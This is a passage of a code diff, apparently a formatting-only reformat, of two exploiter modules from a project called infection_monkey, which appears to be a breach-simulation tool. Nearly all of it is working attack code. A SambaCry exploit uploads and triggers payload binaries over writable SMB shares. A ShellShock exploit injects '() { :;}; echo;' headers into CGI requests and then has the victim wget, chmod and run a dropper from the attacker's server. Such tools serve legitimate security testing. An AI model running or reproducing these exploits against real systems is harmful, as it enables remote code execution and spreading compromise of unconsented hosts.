(samba_version_parts[0] == "4")
|
||||||
|
and (samba_version_parts[1] == "6")
|
||||||
|
and (samba_version_parts[1] <= "3")
|
||||||
|
):
|
||||||
is_vulnerable = True
|
is_vulnerable = True
|
||||||
else:
|
else:
|
||||||
# If pattern doesn't match we can't tell what version it is. Better try
|
# If pattern doesn't match we can't tell what version it is. Better try
|
||||||
is_vulnerable = True
|
is_vulnerable = True
|
||||||
|
|
||||||
LOG.info("Host: %s.samba server name: %s. samba version: %s. is vulnerable: %s" %
|
LOG.info(
|
||||||
(self.host.ip_addr, smb_server_name, samba_version, repr(is_vulnerable)))
|
"Host: %s.samba server name: %s. samba version: %s. is vulnerable: %s"
|
||||||
|
% (self.host.ip_addr, smb_server_name, samba_version, repr(is_vulnerable))
|
||||||
|
)
|
||||||
|
|
||||||
return is_vulnerable
|
return is_vulnerable
|
||||||
|
|
||||||
|
@ -255,27 +309,41 @@ class SambaCryExploiter(HostExploiter):
|
||||||
"""
|
"""
|
||||||
tree_id = smb_client.connectTree(share)
|
tree_id = smb_client.connectTree(share)
|
||||||
|
|
||||||
with self.get_monkey_commandline_file(self._config.dropper_target_path_linux) as monkey_commandline_file:
|
with self.get_monkey_commandline_file(
|
||||||
smb_client.putFile(share, "\\%s" % self.SAMBACRY_COMMANDLINE_FILENAME, monkey_commandline_file.read)
|
self._config.dropper_target_path_linux
|
||||||
|
) as monkey_commandline_file:
|
||||||
|
smb_client.putFile(
|
||||||
|
share, "\\%s" % self.SAMBACRY_COMMANDLINE_FILENAME, monkey_commandline_file.read
|
||||||
|
)
|
||||||
|
|
||||||
with self.get_monkey_runner_bin_file(True) as monkey_runner_bin_file:
|
with self.get_monkey_runner_bin_file(True) as monkey_runner_bin_file:
|
||||||
smb_client.putFile(share, "\\%s" % self.SAMBACRY_RUNNER_FILENAME_32, monkey_runner_bin_file.read)
|
smb_client.putFile(
|
||||||
|
share, "\\%s" % self.SAMBACRY_RUNNER_FILENAME_32, monkey_runner_bin_file.read
|
||||||
|
)
|
||||||
|
|
||||||
with self.get_monkey_runner_bin_file(False) as monkey_runner_bin_file:
|
with self.get_monkey_runner_bin_file(False) as monkey_runner_bin_file:
|
||||||
smb_client.putFile(share, "\\%s" % self.SAMBACRY_RUNNER_FILENAME_64, monkey_runner_bin_file.read)
|
smb_client.putFile(
|
||||||
|
share, "\\%s" % self.SAMBACRY_RUNNER_FILENAME_64, monkey_runner_bin_file.read
|
||||||
|
)
|
||||||
|
|
||||||
monkey_bin_32_src_path = get_target_monkey_by_os(False, True)
|
monkey_bin_32_src_path = get_target_monkey_by_os(False, True)
|
||||||
monkey_bin_64_src_path = get_target_monkey_by_os(False, False)
|
monkey_bin_64_src_path = get_target_monkey_by_os(False, False)
|
||||||
|
|
||||||
with monkeyfs.open(monkey_bin_32_src_path, "rb") as monkey_bin_file:
|
with monkeyfs.open(monkey_bin_32_src_path, "rb") as monkey_bin_file:
|
||||||
smb_client.putFile(share, "\\%s" % self.SAMBACRY_MONKEY_FILENAME_32, monkey_bin_file.read)
|
smb_client.putFile(
|
||||||
|
share, "\\%s" % self.SAMBACRY_MONKEY_FILENAME_32, monkey_bin_file.read
|
||||||
|
)
|
||||||
|
|
||||||
with monkeyfs.open(monkey_bin_64_src_path, "rb") as monkey_bin_file:
|
with monkeyfs.open(monkey_bin_64_src_path, "rb") as monkey_bin_file:
|
||||||
smb_client.putFile(share, "\\%s" % self.SAMBACRY_MONKEY_FILENAME_64, monkey_bin_file.read)
|
smb_client.putFile(
|
||||||
T1105Telem(ScanStatus.USED,
|
share, "\\%s" % self.SAMBACRY_MONKEY_FILENAME_64, monkey_bin_file.read
|
||||||
get_interface_to_target(self.host.ip_addr),
|
)
|
||||||
self.host.ip_addr,
|
T1105Telem(
|
||||||
monkey_bin_64_src_path).send()
|
ScanStatus.USED,
|
||||||
|
get_interface_to_target(self.host.ip_addr),
|
||||||
|
self.host.ip_addr,
|
||||||
|
monkey_bin_64_src_path,
|
||||||
|
).send()
|
||||||
smb_client.disconnectTree(tree_id)
|
smb_client.disconnectTree(tree_id)
|
||||||
|
|
||||||
def trigger_module(self, smb_client, share):
|
def trigger_module(self, smb_client, share):
|
||||||
|
@ -305,7 +373,7 @@ class SambaCryExploiter(HostExploiter):
|
||||||
self.open_pipe(smb_client, "/" + module_path)
|
self.open_pipe(smb_client, "/" + module_path)
|
||||||
except Exception as e:
|
except Exception as e:
|
||||||
# This is the expected result. We can't tell whether we succeeded or not just by this error code.
|
# This is the expected result. We can't tell whether we succeeded or not just by this error code.
|
||||||
if str(e).find('STATUS_OBJECT_NAME_NOT_FOUND') >= 0:
|
if str(e).find("STATUS_OBJECT_NAME_NOT_FOUND") >= 0:
|
||||||
return True
|
return True
|
||||||
else:
|
else:
|
||||||
pass
|
pass
|
||||||
|
@ -320,7 +388,10 @@ class SambaCryExploiter(HostExploiter):
|
||||||
"""
|
"""
|
||||||
sambacry_folder_paths_to_guess = self._config.sambacry_folder_paths_to_guess
|
sambacry_folder_paths_to_guess = self._config.sambacry_folder_paths_to_guess
|
||||||
file_names = [self.SAMBACRY_RUNNER_FILENAME_32, self.SAMBACRY_RUNNER_FILENAME_64]
|
file_names = [self.SAMBACRY_RUNNER_FILENAME_32, self.SAMBACRY_RUNNER_FILENAME_64]
|
||||||
return [posixpath.join(*x) for x in itertools.product(sambacry_folder_paths_to_guess, [share_name], file_names)]
|
return [
|
||||||
|
posixpath.join(*x)
|
||||||
|
for x in itertools.product(sambacry_folder_paths_to_guess, [share_name], file_names)
|
||||||
|
]
|
||||||
|
|
||||||
def get_monkey_runner_bin_file(self, is_32bit):
|
def get_monkey_runner_bin_file(self, is_32bit):
|
||||||
if is_32bit:
|
if is_32bit:
|
||||||
|
@ -329,10 +400,12 @@ class SambaCryExploiter(HostExploiter):
|
||||||
return open(get_binary_file_path(self.SAMBACRY_RUNNER_FILENAME_64), "rb")
|
return open(get_binary_file_path(self.SAMBACRY_RUNNER_FILENAME_64), "rb")
|
||||||
|
|
||||||
def get_monkey_commandline_file(self, location):
|
def get_monkey_commandline_file(self, location):
|
||||||
return BytesIO(DROPPER_ARG + build_monkey_commandline(self.host,
|
return BytesIO(
|
||||||
get_monkey_depth() - 1,
|
DROPPER_ARG
|
||||||
SambaCryExploiter.SAMBA_PORT,
|
+ build_monkey_commandline(
|
||||||
str(location)))
|
self.host, get_monkey_depth() - 1, SambaCryExploiter.SAMBA_PORT, str(location)
|
||||||
|
)
|
||||||
|
)
|
||||||
|
|
||||||
@staticmethod
|
@staticmethod
|
||||||
def is_share_writable(smb_client, share):
|
def is_share_writable(smb_client, share):
|
||||||
|
@ -342,14 +415,14 @@ class SambaCryExploiter(HostExploiter):
|
||||||
:param share: share name
|
:param share: share name
|
||||||
:return: True if share is writable, False otherwise.
|
:return: True if share is writable, False otherwise.
|
||||||
"""
|
"""
|
||||||
LOG.debug('Checking %s for write access' % share)
|
LOG.debug("Checking %s for write access" % share)
|
||||||
try:
|
try:
|
||||||
tree_id = smb_client.connectTree(share)
|
tree_id = smb_client.connectTree(share)
|
||||||
except (impacket.smbconnection.SessionError, SessionError):
|
except (impacket.smbconnection.SessionError, SessionError):
|
||||||
return False
|
return False
|
||||||
|
|
||||||
try:
|
try:
|
||||||
smb_client.openFile(tree_id, '\\', FILE_WRITE_DATA, creationOption=FILE_DIRECTORY_FILE)
|
smb_client.openFile(tree_id, "\\", FILE_WRITE_DATA, creationOption=FILE_DIRECTORY_FILE)
|
||||||
writable = True
|
writable = True
|
||||||
except (impacket.smbconnection.SessionError, SessionError):
|
except (impacket.smbconnection.SessionError, SessionError):
|
||||||
writable = False
|
writable = False
|
||||||
|
@ -369,85 +442,103 @@ class SambaCryExploiter(HostExploiter):
|
||||||
"""
|
"""
|
||||||
smb_client = SMBConnection(ip, ip)
|
smb_client = SMBConnection(ip, ip)
|
||||||
smb_client.login(
|
smb_client.login(
|
||||||
credentials["username"], credentials["password"], '', credentials["lm_hash"], credentials["ntlm_hash"])
|
credentials["username"],
|
||||||
|
credentials["password"],
|
||||||
|
"",
|
||||||
|
credentials["lm_hash"],
|
||||||
|
credentials["ntlm_hash"],
|
||||||
|
)
|
||||||
return smb_client
|
return smb_client
|
||||||
|
|
||||||
# Following are slightly modified SMB functions from impacket to fit our needs of the vulnerability #
|
# Following are slightly modified SMB functions from impacket to fit our needs of the vulnerability #
|
||||||
@staticmethod
|
@staticmethod
|
||||||
def create_smb(smb_client, treeId, fileName, desiredAccess, shareMode, creationOptions, creationDisposition,
|
def create_smb(
|
||||||
fileAttributes, impersonationLevel=SMB2_IL_IMPERSONATION, securityFlags=0,
|
smb_client,
|
||||||
oplockLevel=SMB2_OPLOCK_LEVEL_NONE, createContexts=None):
|
treeId,
|
||||||
|
fileName,
|
||||||
|
desiredAccess,
|
||||||
|
shareMode,
|
||||||
|
creationOptions,
|
||||||
|
creationDisposition,
|
||||||
|
fileAttributes,
|
||||||
|
impersonationLevel=SMB2_IL_IMPERSONATION,
|
||||||
|
securityFlags=0,
|
||||||
|
oplockLevel=SMB2_OPLOCK_LEVEL_NONE,
|
||||||
|
createContexts=None,
|
||||||
|
):
|
||||||
|
|
||||||
packet = smb_client.getSMBServer().SMB_PACKET()
|
packet = smb_client.getSMBServer().SMB_PACKET()
|
||||||
packet['Command'] = SMB2_CREATE
|
packet["Command"] = SMB2_CREATE
|
||||||
packet['TreeID'] = treeId
|
packet["TreeID"] = treeId
|
||||||
if smb_client._SMBConnection._Session['TreeConnectTable'][treeId]['IsDfsShare'] is True:
|
if smb_client._SMBConnection._Session["TreeConnectTable"][treeId]["IsDfsShare"] is True:
|
||||||
packet['Flags'] = SMB2_FLAGS_DFS_OPERATIONS
|
packet["Flags"] = SMB2_FLAGS_DFS_OPERATIONS
|
||||||
|
|
||||||
smb2Create = SMB2Create()
|
smb2Create = SMB2Create()
|
||||||
smb2Create['SecurityFlags'] = 0
|
smb2Create["SecurityFlags"] = 0
|
||||||
smb2Create['RequestedOplockLevel'] = oplockLevel
|
smb2Create["RequestedOplockLevel"] = oplockLevel
|
||||||
smb2Create['ImpersonationLevel'] = impersonationLevel
|
smb2Create["ImpersonationLevel"] = impersonationLevel
|
||||||
smb2Create['DesiredAccess'] = desiredAccess
|
smb2Create["DesiredAccess"] = desiredAccess
|
||||||
smb2Create['FileAttributes'] = fileAttributes
|
smb2Create["FileAttributes"] = fileAttributes
|
||||||
smb2Create['ShareAccess'] = shareMode
|
smb2Create["ShareAccess"] = shareMode
|
||||||
smb2Create['CreateDisposition'] = creationDisposition
|
smb2Create["CreateDisposition"] = creationDisposition
|
||||||
smb2Create['CreateOptions'] = creationOptions
|
smb2Create["CreateOptions"] = creationOptions
|
||||||
|
|
||||||
smb2Create['NameLength'] = len(fileName) * 2
|
smb2Create["NameLength"] = len(fileName) * 2
|
||||||
if fileName != '':
|
if fileName != "":
|
||||||
smb2Create['Buffer'] = fileName.encode('utf-16le')
|
smb2Create["Buffer"] = fileName.encode("utf-16le")
|
||||||
else:
|
else:
|
||||||
smb2Create['Buffer'] = b'\x00'
|
smb2Create["Buffer"] = b"\x00"
|
||||||
|
|
||||||
if createContexts is not None:
|
if createContexts is not None:
|
||||||
smb2Create['Buffer'] += createContexts
|
smb2Create["Buffer"] += createContexts
|
||||||
smb2Create['CreateContextsOffset'] = len(SMB2Packet()) + SMB2Create.SIZE + smb2Create['NameLength']
|
smb2Create["CreateContextsOffset"] = (
|
||||||
smb2Create['CreateContextsLength'] = len(createContexts)
|
len(SMB2Packet()) + SMB2Create.SIZE + smb2Create["NameLength"]
|
||||||
|
)
|
||||||
|
smb2Create["CreateContextsLength"] = len(createContexts)
|
||||||
else:
|
else:
|
||||||
smb2Create['CreateContextsOffset'] = 0
|
smb2Create["CreateContextsOffset"] = 0
|
||||||
smb2Create['CreateContextsLength'] = 0
|
smb2Create["CreateContextsLength"] = 0
|
||||||
|
|
||||||
packet['Data'] = smb2Create
|
packet["Data"] = smb2Create
|
||||||
|
|
||||||
packetID = smb_client.getSMBServer().sendSMB(packet)
|
packetID = smb_client.getSMBServer().sendSMB(packet)
|
||||||
ans = smb_client.getSMBServer().recvSMB(packetID)
|
ans = smb_client.getSMBServer().recvSMB(packetID)
|
||||||
if ans.isValidAnswer(STATUS_SUCCESS):
|
if ans.isValidAnswer(STATUS_SUCCESS):
|
||||||
createResponse = SMB2Create_Response(ans['Data'])
|
createResponse = SMB2Create_Response(ans["Data"])
|
||||||
|
|
||||||
# The client MUST generate a handle for the Open, and it MUST
|
# The client MUST generate a handle for the Open, and it MUST
|
||||||
# return success and the generated handle to the calling application.
|
# return success and the generated handle to the calling application.
|
||||||
# In our case, str(FileID)
|
# In our case, str(FileID)
|
||||||
return str(createResponse['FileID'])
|
return str(createResponse["FileID"])
|
||||||
|
|
||||||
@staticmethod
|
@staticmethod
|
||||||
def open_pipe(smb_client, pathName):
|
def open_pipe(smb_client, pathName):
|
||||||
# We need to overwrite Impacket's openFile functions since they automatically convert paths to NT style
|
# We need to overwrite Impacket's openFile functions since they automatically convert paths to NT style
|
||||||
# to make things easier for the caller. Not this time ;)
|
# to make things easier for the caller. Not this time ;)
|
||||||
treeId = smb_client.connectTree('IPC$')
|
treeId = smb_client.connectTree("IPC$")
|
||||||
LOG.debug('Triggering path: %s' % pathName)
|
LOG.debug("Triggering path: %s" % pathName)
|
||||||
|
|
||||||
if smb_client.getDialect() == SMB_DIALECT:
|
if smb_client.getDialect() == SMB_DIALECT:
|
||||||
_, flags2 = smb_client.getSMBServer().get_flags()
|
_, flags2 = smb_client.getSMBServer().get_flags()
|
||||||
|
|
||||||
pathName = pathName.encode('utf-16le') if flags2 & SMB.FLAGS2_UNICODE else pathName
|
pathName = pathName.encode("utf-16le") if flags2 & SMB.FLAGS2_UNICODE else pathName
|
||||||
|
|
||||||
ntCreate = SMBCommand(SMB.SMB_COM_NT_CREATE_ANDX)
|
ntCreate = SMBCommand(SMB.SMB_COM_NT_CREATE_ANDX)
|
||||||
ntCreate['Parameters'] = SMBNtCreateAndX_Parameters()
|
ntCreate["Parameters"] = SMBNtCreateAndX_Parameters()
|
||||||
ntCreate['Data'] = SMBNtCreateAndX_Data(flags=flags2)
|
ntCreate["Data"] = SMBNtCreateAndX_Data(flags=flags2)
|
||||||
ntCreate['Parameters']['FileNameLength'] = len(pathName)
|
ntCreate["Parameters"]["FileNameLength"] = len(pathName)
|
||||||
ntCreate['Parameters']['AccessMask'] = FILE_READ_DATA
|
ntCreate["Parameters"]["AccessMask"] = FILE_READ_DATA
|
||||||
ntCreate['Parameters']['FileAttributes'] = 0
|
ntCreate["Parameters"]["FileAttributes"] = 0
|
||||||
ntCreate['Parameters']['ShareAccess'] = FILE_SHARE_READ
|
ntCreate["Parameters"]["ShareAccess"] = FILE_SHARE_READ
|
||||||
ntCreate['Parameters']['Disposition'] = FILE_NON_DIRECTORY_FILE
|
ntCreate["Parameters"]["Disposition"] = FILE_NON_DIRECTORY_FILE
|
||||||
ntCreate['Parameters']['CreateOptions'] = FILE_OPEN
|
ntCreate["Parameters"]["CreateOptions"] = FILE_OPEN
|
||||||
ntCreate['Parameters']['Impersonation'] = SMB2_IL_IMPERSONATION
|
ntCreate["Parameters"]["Impersonation"] = SMB2_IL_IMPERSONATION
|
||||||
ntCreate['Parameters']['SecurityFlags'] = 0
|
ntCreate["Parameters"]["SecurityFlags"] = 0
|
||||||
ntCreate['Parameters']['CreateFlags'] = 0x16
|
ntCreate["Parameters"]["CreateFlags"] = 0x16
|
||||||
ntCreate['Data']['FileName'] = pathName
|
ntCreate["Data"]["FileName"] = pathName
|
||||||
|
|
||||||
if flags2 & SMB.FLAGS2_UNICODE:
|
if flags2 & SMB.FLAGS2_UNICODE:
|
||||||
ntCreate['Data']['Pad'] = 0x0
|
ntCreate["Data"]["Pad"] = 0x0
|
||||||
|
|
||||||
return smb_client.getSMBServer().nt_create_andx(treeId, pathName, cmd=ntCreate)
|
return smb_client.getSMBServer().nt_create_andx(treeId, pathName, cmd=ntCreate)
|
||||||
else:
|
else:
|
||||||
|
@ -459,4 +550,5 @@ class SambaCryExploiter(HostExploiter):
|
||||||
shareMode=FILE_SHARE_READ,
|
shareMode=FILE_SHARE_READ,
|
||||||
creationOptions=FILE_OPEN,
|
creationOptions=FILE_OPEN,
|
||||||
creationDisposition=FILE_NON_DIRECTORY_FILE,
|
creationDisposition=FILE_NON_DIRECTORY_FILE,
|
||||||
fileAttributes=0)
|
fileAttributes=0,
|
||||||
|
)
|
||||||
|
|
|
@ -9,51 +9,58 @@ import requests
|
||||||
from common.utils.attack_utils import ScanStatus
|
from common.utils.attack_utils import ScanStatus
|
||||||
from infection_monkey.exploit.HostExploiter import HostExploiter
|
from infection_monkey.exploit.HostExploiter import HostExploiter
|
||||||
from infection_monkey.exploit.shellshock_resources import CGI_FILES
|
from infection_monkey.exploit.shellshock_resources import CGI_FILES
|
||||||
from infection_monkey.exploit.tools.helpers import build_monkey_commandline, get_monkey_depth, get_target_monkey
|
from infection_monkey.exploit.tools.helpers import (
|
||||||
|
build_monkey_commandline,
|
||||||
|
get_monkey_depth,
|
||||||
|
get_target_monkey,
|
||||||
|
)
|
||||||
from infection_monkey.exploit.tools.http_tools import HTTPTools
|
from infection_monkey.exploit.tools.http_tools import HTTPTools
|
||||||
from infection_monkey.model import DROPPER_ARG
|
from infection_monkey.model import DROPPER_ARG
|
||||||
from infection_monkey.telemetry.attack.t1222_telem import T1222Telem
|
from infection_monkey.telemetry.attack.t1222_telem import T1222Telem
|
||||||
|
|
||||||
__author__ = 'danielg'
|
__author__ = "danielg"
|
||||||
|
|
||||||
LOG = logging.getLogger(__name__)
|
LOG = logging.getLogger(__name__)
|
||||||
TIMEOUT = 2
|
TIMEOUT = 2
|
||||||
TEST_COMMAND = '/bin/uname -a'
|
TEST_COMMAND = "/bin/uname -a"
|
||||||
DOWNLOAD_TIMEOUT = 300 # copied from rdpgrinder
|
DOWNLOAD_TIMEOUT = 300 # copied from rdpgrinder
|
||||||
LOCK_HELPER_FILE = '/tmp/monkey_shellshock'
|
LOCK_HELPER_FILE = "/tmp/monkey_shellshock"
|
||||||
|
|
||||||
|
|
||||||
class ShellShockExploiter(HostExploiter):
|
class ShellShockExploiter(HostExploiter):
|
||||||
_attacks = {
|
_attacks = {"Content-type": "() { :;}; echo; "}
|
||||||
"Content-type": "() { :;}; echo; "
|
|
||||||
}
|
|
||||||
|
|
||||||
_TARGET_OS_TYPE = ['linux']
|
_TARGET_OS_TYPE = ["linux"]
|
||||||
_EXPLOITED_SERVICE = 'Bash'
|
_EXPLOITED_SERVICE = "Bash"
|
||||||
|
|
||||||
def __init__(self, host):
|
def __init__(self, host):
|
||||||
super(ShellShockExploiter, self).__init__(host)
|
super(ShellShockExploiter, self).__init__(host)
|
||||||
self.HTTP = [str(port) for port in self._config.HTTP_PORTS]
|
self.HTTP = [str(port) for port in self._config.HTTP_PORTS]
|
||||||
self.success_flag = ''.join(
|
self.success_flag = "".join(
|
||||||
choice(string.ascii_uppercase + string.digits
|
choice(string.ascii_uppercase + string.digits) for _ in range(20)
|
||||||
) for _ in range(20))
|
)
|
||||||
self.skip_exist = self._config.skip_exploit_if_file_exist
|
self.skip_exist = self._config.skip_exploit_if_file_exist
|
||||||
|
|
||||||
def _exploit_host(self):
|
def _exploit_host(self):
|
||||||
# start by picking ports
|
# start by picking ports
|
||||||
candidate_services = {
|
candidate_services = {
|
||||||
service: self.host.services[service] for service in self.host.services if
|
service: self.host.services[service]
|
||||||
('name' in self.host.services[service]) and (self.host.services[service]['name'] == 'http')
|
for service in self.host.services
|
||||||
|
if ("name" in self.host.services[service])
|
||||||
|
and (self.host.services[service]["name"] == "http")
|
||||||
}
|
}
|
||||||
|
|
||||||
valid_ports = [(port, candidate_services['tcp-' + str(port)]['data'][1]) for port in self.HTTP if
|
valid_ports = [
|
||||||
'tcp-' + str(port) in candidate_services]
|
(port, candidate_services["tcp-" + str(port)]["data"][1])
|
||||||
|
for port in self.HTTP
|
||||||
|
if "tcp-" + str(port) in candidate_services
|
||||||
|
]
|
||||||
http_ports = [port[0] for port in valid_ports if not port[1]]
|
http_ports = [port[0] for port in valid_ports if not port[1]]
|
||||||
https_ports = [port[0] for port in valid_ports if port[1]]
|
https_ports = [port[0] for port in valid_ports if port[1]]
|
||||||
|
|
||||||
LOG.info(
|
LOG.info(
|
||||||
'Scanning %s, ports [%s] for vulnerable CGI pages' % (
|
"Scanning %s, ports [%s] for vulnerable CGI pages"
|
||||||
self.host, ",".join([str(port[0]) for port in valid_ports]))
|
% (self.host, ",".join([str(port[0]) for port in valid_ports]))
|
||||||
)
|
)
|
||||||
|
|
||||||
attackable_urls = []
|
attackable_urls = []
|
||||||
|
@ -69,39 +76,45 @@ class ShellShockExploiter(HostExploiter):
|
||||||
exploitable_urls = [url for url in exploitable_urls if url[0] is True]
|
exploitable_urls = [url for url in exploitable_urls if url[0] is True]
|
||||||
|
|
||||||
# we want to report all vulnerable URLs even if we didn't succeed
|
# we want to report all vulnerable URLs even if we didn't succeed
|
||||||
self.exploit_info['vulnerable_urls'] = [url[1] for url in exploitable_urls]
|
self.exploit_info["vulnerable_urls"] = [url[1] for url in exploitable_urls]
|
||||||
|
|
||||||
# now try URLs until we install something on victim
|
# now try URLs until we install something on victim
|
||||||
for _, url, header, exploit in exploitable_urls:
|
for _, url, header, exploit in exploitable_urls:
|
||||||
LOG.info("Trying to attack host %s with %s URL" % (self.host, url))
|
LOG.info("Trying to attack host %s with %s URL" % (self.host, url))
|
||||||
# same attack script as sshexec
|
# same attack script as sshexec
|
||||||
# for any failure, quit and don't try other URLs
|
# for any failure, quit and don't try other URLs
|
||||||
if not self.host.os.get('type'):
|
if not self.host.os.get("type"):
|
||||||
try:
|
try:
|
||||||
uname_os_attack = exploit + '/bin/uname -o'
|
uname_os_attack = exploit + "/bin/uname -o"
|
||||||
uname_os = self.attack_page(url, header, uname_os_attack)
|
uname_os = self.attack_page(url, header, uname_os_attack)
|
||||||
if 'linux' in uname_os:
|
if "linux" in uname_os:
|
||||||
self.host.os['type'] = 'linux'
|
self.host.os["type"] = "linux"
|
||||||
else:
|
else:
|
||||||
LOG.info("SSH Skipping unknown os: %s", uname_os)
|
LOG.info("SSH Skipping unknown os: %s", uname_os)
|
||||||
return False
|
return False
|
||||||
except Exception as exc:
|
except Exception as exc:
|
||||||
LOG.debug("Error running uname os command on victim %r: (%s)", self.host, exc)
|
LOG.debug("Error running uname os command on victim %r: (%s)", self.host, exc)
|
||||||
return False
|
return False
|
||||||
if not self.host.os.get('machine'):
|
if not self.host.os.get("machine"):
|
||||||
try:
|
try:
|
||||||
uname_machine_attack = exploit + '/bin/uname -m'
|
uname_machine_attack = exploit + "/bin/uname -m"
|
||||||
uname_machine = self.attack_page(url, header, uname_machine_attack)
|
uname_machine = self.attack_page(url, header, uname_machine_attack)
|
||||||
if '' != uname_machine:
|
if "" != uname_machine:
|
||||||
self.host.os['machine'] = uname_machine.lower().strip()
|
self.host.os["machine"] = uname_machine.lower().strip()
|
||||||
except Exception as exc:
|
except Exception as exc:
|
||||||
LOG.debug("Error running uname machine command on victim %r: (%s)", self.host, exc)
|
LOG.debug(
|
||||||
|
"Error running uname machine command on victim %r: (%s)", self.host, exc
|
||||||
|
)
|
||||||
return False
|
return False
|
||||||
|
|
||||||
# copy the monkey
|
# copy the monkey
|
||||||
dropper_target_path_linux = self._config.dropper_target_path_linux
|
dropper_target_path_linux = self._config.dropper_target_path_linux
|
||||||
if self.skip_exist and (self.check_remote_file_exists(url, header, exploit, dropper_target_path_linux)):
|
if self.skip_exist and (
|
||||||
LOG.info("Host %s was already infected under the current configuration, done" % self.host)
|
self.check_remote_file_exists(url, header, exploit, dropper_target_path_linux)
|
||||||
|
):
|
||||||
|
LOG.info(
|
||||||
|
"Host %s was already infected under the current configuration, done" % self.host
|
||||||
|
)
|
||||||
return True # return already infected
|
return True # return already infected
|
||||||
|
|
||||||
src_path = get_target_monkey(self.host)
|
src_path = get_target_monkey(self.host)
|
||||||
|
@ -119,12 +132,12 @@ class ShellShockExploiter(HostExploiter):
|
||||||
LOG.debug("Exploiter ShellShock failed, http transfer creation failed.")
|
LOG.debug("Exploiter ShellShock failed, http transfer creation failed.")
|
||||||
return False
|
return False
|
||||||
|
|
||||||
download_command = '/usr/bin/wget %s -O %s;' % (
|
download_command = "/usr/bin/wget %s -O %s;" % (http_path, dropper_target_path_linux)
|
||||||
http_path, dropper_target_path_linux)
|
|
||||||
|
|
||||||
download = exploit + download_command
|
download = exploit + download_command
|
||||||
self.attack_page(url, header,
|
self.attack_page(
|
||||||
download) # we ignore failures here since it might take more than TIMEOUT time
|
url, header, download
|
||||||
|
) # we ignore failures here since it might take more than TIMEOUT time
|
||||||
|
|
||||||
http_thread.join(DOWNLOAD_TIMEOUT)
|
http_thread.join(DOWNLOAD_TIMEOUT)
|
||||||
http_thread.stop()
|
http_thread.stop()
|
||||||
|
@ -132,30 +145,44 @@ class ShellShockExploiter(HostExploiter):
|
||||||
self._remove_lock_file(exploit, url, header)
|
self._remove_lock_file(exploit, url, header)
|
||||||
|
|
||||||
if (http_thread.downloads != 1) or (
|
if (http_thread.downloads != 1) or (
|
||||||
'ELF' not in self.check_remote_file_exists(url, header, exploit, dropper_target_path_linux)):
|
"ELF"
|
||||||
|
not in self.check_remote_file_exists(
|
||||||
|
url, header, exploit, dropper_target_path_linux
|
||||||
|
)
|
||||||
|
):
|
||||||
LOG.debug("Exploiter %s failed, http download failed." % self.__class__.__name__)
|
LOG.debug("Exploiter %s failed, http download failed." % self.__class__.__name__)
|
||||||
continue
|
continue
|
||||||
|
|
||||||
# turn the monkey into an executable
|
# turn the monkey into an executable
|
||||||
chmod = '/bin/chmod +x %s' % dropper_target_path_linux
|
chmod = "/bin/chmod +x %s" % dropper_target_path_linux
|
||||||
run_path = exploit + chmod
|
run_path = exploit + chmod
|
||||||
self.attack_page(url, header, run_path)
|
self.attack_page(url, header, run_path)
|
||||||
T1222Telem(ScanStatus.USED, chmod, self.host).send()
|
T1222Telem(ScanStatus.USED, chmod, self.host).send()
|
||||||
|
|
||||||
# run the monkey
|
# run the monkey
|
||||||
cmdline = "%s %s" % (dropper_target_path_linux, DROPPER_ARG)
|
cmdline = "%s %s" % (dropper_target_path_linux, DROPPER_ARG)
|
||||||
cmdline += build_monkey_commandline(self.host,
|
cmdline += build_monkey_commandline(
|
||||||
get_monkey_depth() - 1,
|
self.host,
|
||||||
HTTPTools.get_port_from_url(url),
|
get_monkey_depth() - 1,
|
||||||
dropper_target_path_linux)
|
HTTPTools.get_port_from_url(url),
|
||||||
cmdline += ' & '
|
dropper_target_path_linux,
|
||||||
|
)
|
||||||
|
cmdline += " & "
|
||||||
run_path = exploit + cmdline
|
run_path = exploit + cmdline
|
||||||
self.attack_page(url, header, run_path)
|
self.attack_page(url, header, run_path)
|
||||||
|
|
||||||
LOG.info("Executed monkey '%s' on remote victim %r (cmdline=%r)",
|
LOG.info(
|
||||||
self._config.dropper_target_path_linux, self.host, cmdline)
|
"Executed monkey '%s' on remote victim %r (cmdline=%r)",
|
||||||
|
self._config.dropper_target_path_linux,
|
||||||
|
self.host,
|
||||||
|
cmdline,
|
||||||
|
)
|
||||||
|
|
||||||
if not (self.check_remote_file_exists(url, header, exploit, self._config.monkey_log_path_linux)):
|
if not (
|
||||||
|
self.check_remote_file_exists(
|
||||||
|
url, header, exploit, self._config.monkey_log_path_linux
|
||||||
|
)
|
||||||
|
):
|
||||||
LOG.info("Log file does not exist, monkey might not have run")
|
LOG.info("Log file does not exist, monkey might not have run")
|
||||||
continue
|
continue
|
||||||
self.add_executed_cmd(cmdline)
|
self.add_executed_cmd(cmdline)
|
||||||
|
@ -169,7 +196,7 @@ class ShellShockExploiter(HostExploiter):
|
||||||
Checks if a remote file exists and returns the content if so
|
Checks if a remote file exists and returns the content if so
|
||||||
file_path should be fully qualified
|
file_path should be fully qualified
|
||||||
"""
|
"""
|
||||||
cmdline = '/usr/bin/head -c 4 %s' % file_path
|
cmdline = "/usr/bin/head -c 4 %s" % file_path
|
||||||
run_path = exploit + cmdline
|
run_path = exploit + cmdline
|
||||||
resp = cls.attack_page(url, header, run_path)
|
resp = cls.attack_page(url, header, run_path)
|
||||||
if resp:
|
if resp:
|
||||||
|
@ -187,24 +214,24 @@ class ShellShockExploiter(HostExploiter):
|
||||||
|
|
||||||
LOG.debug("Trying exploit for %s" % url)
|
LOG.debug("Trying exploit for %s" % url)
|
||||||
for header, exploit in list(attacks.items()):
|
for header, exploit in list(attacks.items()):
|
||||||
attack = exploit + ' echo ' + self.success_flag + "; " + TEST_COMMAND
|
attack = exploit + " echo " + self.success_flag + "; " + TEST_COMMAND
|
||||||
result = self.attack_page(url, header, attack)
|
result = self.attack_page(url, header, attack)
|
||||||
if self.success_flag in result:
|
if self.success_flag in result:
|
||||||
LOG.info("URL %s looks vulnerable" % url)
|
LOG.info("URL %s looks vulnerable" % url)
|
||||||
return True, url, header, exploit
|
return True, url, header, exploit
|
||||||
else:
|
else:
|
||||||
LOG.debug("URL %s does not seem to be vulnerable with %s header" % (url, header))
|
LOG.debug("URL %s does not seem to be vulnerable with %s header" % (url, header))
|
||||||
return False,
|
return (False,)
|
||||||
|
|
||||||
def _create_lock_file(self, exploit, url, header):
|
def _create_lock_file(self, exploit, url, header):
|
||||||
if self.check_remote_file_exists(url, header, exploit, LOCK_HELPER_FILE):
|
if self.check_remote_file_exists(url, header, exploit, LOCK_HELPER_FILE):
|
||||||
return False
|
return False
|
||||||
cmd = exploit + 'echo AAAA > %s' % LOCK_HELPER_FILE
|
cmd = exploit + "echo AAAA > %s" % LOCK_HELPER_FILE
|
||||||
